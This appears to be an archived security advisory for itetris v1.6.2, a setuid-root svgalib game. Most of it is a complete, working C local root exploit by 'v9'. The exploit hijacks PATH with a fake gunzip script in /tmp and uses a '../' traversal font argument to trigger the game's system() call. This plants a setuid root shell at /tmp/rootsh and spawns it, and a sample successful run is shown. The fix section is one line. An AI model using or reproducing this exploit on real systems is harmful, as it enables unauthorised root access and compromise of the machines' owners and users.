COMMAND

    itetris

SYSTEMS AFFECTED

    itetris v1.6.2

PROBLEM

    Chris Sharp found following.   He was auditing some svgalib  (suid
    root)  programs  and  noticed  itetris  had a possibly exploitable
    system(); call... which has since obviously proven exploitable.

    ORIGINAL exploit url below:

        http://realhalo.org/xitetris.c

    Here is the code:

    /*  (*)itetris[v1.6.2]  local  root  exploit, by: v9[v9@fakehalo.org].
    this  will  give  you  root  on  systems  that  have  the itetris game
    installed.  the  program is installed  setuid(0)/root due to  svgalib.
    this exploits  a system()  call mixed  with bad  ../ protection, which
    makes this possible --  considering it needs a  font file to end  with
    ".gz" to run gunzip.
    
    ---------------------------------------------------------------------------
       # cc xitetris.c -o xitetris
       # ./xitetris
       [ (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.org]. ]
       [*] checking /usr/local/bin/itetris for proper file permissions.
       [*] done, /usr/local/bin/itetris appears to be setuid.
       [*] done, making temporary files.
       [*] done, setting up environment variable(s).
       [*] done, launching /usr/local/bin/itetris. (the screen may blink locally)
       [*] done, cleaning up temporary files.
       [*] done, checking /tmp/rootsh for proper file permissions.
       [*] success! /tmp/rootsh appears to be set*id.
       [?] do you wish to enter the rootshell now(y/n)?: y
       [*] ok, executing rootshell(/tmp/rootsh) now.
       #
    
    ---------------------------------------------------------------------------
    */
    #define PATH
    "/usr/local/bin/itetris"        // path to itetris.
    #define APPENDPATH
    "/tmp"                          // tmp dir to use.
    #define EXECFILE
    "gunzip"                        // don't change this.
    #define FAKEFILE
    "xitetris.gz"                   // must end with .gz.
    #define SUIDSHELL
    "/tmp/rootsh"                   // root shell
    location.
    #include <stdio.h>
    #include <sys/stat.h>
    main(){
     char cmd[256],tmpfile[256],fakefile[256],path[1024],input[0];
     struct stat mod1,mod2;
     FILE *suidexec,*fakegz;
     fprintf(stderr,"[ (*)itetris[v1.6.2] local root exploit, by: v9[v9@fakehalo.org]. ]\n");
     fprintf(stderr,"[*] checking %s for proper file permissions.\n",PATH);
     if(stat(PATH,&mod1)){
      fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",PATH);
      exit(1);
     }
     else if(mod1.st_mode==35309){
      fprintf(stderr,"[*] done, %s appears to be setuid.\n",PATH);
     }
     else{
      fprintf(stderr,"[!] failed, %s doesn't appear to be setuid.\n",PATH);
      exit(1);
     }
     fprintf(stderr,"[*] done, making temporary files.\n");
    
    snprintf(fakefile,sizeof(fakefile),"%s/%s",APPENDPATH,FAKEFILE);
    
    snprintf(tmpfile,sizeof(tmpfile),"%s/%s",APPENDPATH,EXECFILE);
    
    unlink(fakefile);fakegz=fopen(fakefile,"w");fclose(fakegz);
     unlink(tmpfile);suidexec=fopen(tmpfile,"w");
     fprintf(suidexec,"#!/bin/sh\n");
     fprintf(suidexec,"cp /bin/sh %s\n",SUIDSHELL);
     fprintf(suidexec,"chown 0.0 %s\n",SUIDSHELL);
     fprintf(suidexec,"chmod 6755 %s\n",SUIDSHELL);
     fclose(suidexec);
     chmod(tmpfile,33261);
     fprintf(stderr,"[*] done, setting up environment variable(s).\n");
    
    snprintf(path,sizeof(path),"%s:%s",APPENDPATH,getenv("PATH"));
     setenv("PATH",path,1);
     fprintf(stderr,"[*] done, launching %s. (the screen may blink locally)\n",
     PATH);
     sleep(1);
     snprintf(cmd,sizeof(cmd),"%s -VE -F../../../../%s/%s 1>/dev/null 2>&1",PATH,
     APPENDPATH,FAKEFILE);
     system(cmd);
     fprintf(stderr,"[*] done, cleaning up temporary files.\n");
     unlink(fakefile);unlink(tmpfile);
     fprintf(stderr,"[*] done, checking %s for proper file permissions.\n",
     SUIDSHELL);
     if(stat(SUIDSHELL,&mod2)){
      fprintf(stderr,"[!] failed, %s doesnt appear to exist.\n",SUIDSHELL);
      exit(1);
     }
     else if(mod2.st_mode==36333){
      fprintf(stderr,"[*] success! %s appears to be set*id.\n",SUIDSHELL);
     }
     else{
      fprintf(stderr,"[!] failed, %s doesn't appear to be set*id.\n",SUIDSHELL);
      exit(1);
     }
     fprintf(stderr,"[?] do you wish to enter the rootshell now(y/n)?: ");
     scanf("%s",input);
     if(input[0]!=0x59&&input[0]!=0x79){
      printf("[*] aborted, the rootshell is: %s.\n",SUIDSHELL);
     }
     else{
      printf("[*] ok, executing rootshell(%s) now.\n",SUIDSHELL);
      execl(SUIDSHELL,SUIDSHELL,0);
     }
     fprintf(stderr,"[*] exiting program successfully.\n");
     exit(0);
    }

SOLUTION

    Should be fixed in new release.